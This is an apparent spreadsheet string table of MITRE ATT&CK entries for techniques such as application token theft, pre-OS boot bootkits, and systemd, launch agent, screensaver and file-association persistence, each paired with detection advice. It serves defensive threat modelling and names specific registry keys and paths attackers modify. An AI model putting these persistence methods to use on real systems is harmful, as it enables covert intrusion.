Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>Azure activity logs,OAuth audit logs</t>
  </si>
  <si>
    <t>SaaS,Office 365,Azure AD</t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.
Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems.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link through [Spearphishing Link](https://attack.mitre.org/techniques/T1192) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1527).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</t>
  </si>
  <si>
    <t>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Adversaries may access data objects from improperly secured cloud storage.
Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</t>
  </si>
  <si>
    <t>Windows,macOS,Linux,Office 365,SaaS</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack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attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)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email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)</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</si>
  <si>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For example, AWS GuardDuty is not supported in every region.(Citation: AWS Region Service Table)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t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>Azure,AWS,GCP</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.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
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Azure AD,Office 365</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</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</si>
  <si>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t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,SaaS</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access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There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>VBR,MBR,Component firmware,Process monitoring,Disk forensics,EFI,BIOS,API monitoring</t>
  </si>
  <si>
    <t>Linux,Windows,Network</t>
  </si>
  <si>
    <t>Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)</t>
  </si>
  <si>
    <t>Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.</t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,File monitoring</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>EFI,BIOS,API monitoring</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: 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t>
  </si>
  <si>
    <t>persistence,defense-evasion</t>
  </si>
  <si>
    <t>Host intrusion prevention systems,Anti-virus,File monitoring</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Component firmware,Process monitoring,Disk forensics,API monitoring</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>VBR,MBR,API monitoring</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016)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 (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>ROMMONkit</t>
  </si>
  <si>
    <t>File monitoring,Netflow/Enclave netflow,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</t>
  </si>
  <si>
    <t>Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>Network device run-time memory,Network device command history,Network device configuration,File monitoring,Network device logs</t>
  </si>
  <si>
    <t>Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</t>
  </si>
  <si>
    <t>Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>Windows event logs,Windows Registry,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) 
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  
Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).  </t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;$HOME/Library/LaunchAgents&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories and have the file extension &lt;code&gt;.service&lt;/code&gt;. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
* ExecReload directive covers when a service restarts. 
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories, low privilege users can create/modify service unit files in directories such as &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>API monitoring,Windows event logs,Process command-line parameters,Process monitoring,File monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  
Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  
Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.
Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t xml:space="preserve">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Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). 
Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.
An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. 
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). </t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). 
Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories  (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root. 
The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation. </t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>API monitoring,Windows event logs,System calls,Binary file metadata,Process use of network,WMI Objects,File monitoring,Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 
These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 
Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process.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 </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. 
Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. </t>
  </si>
  <si>
    <t>privilege-escalation,persistence</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.
User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017)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 &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>File monitoring,Windows Registry,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt;  on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,WMI Objects</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)
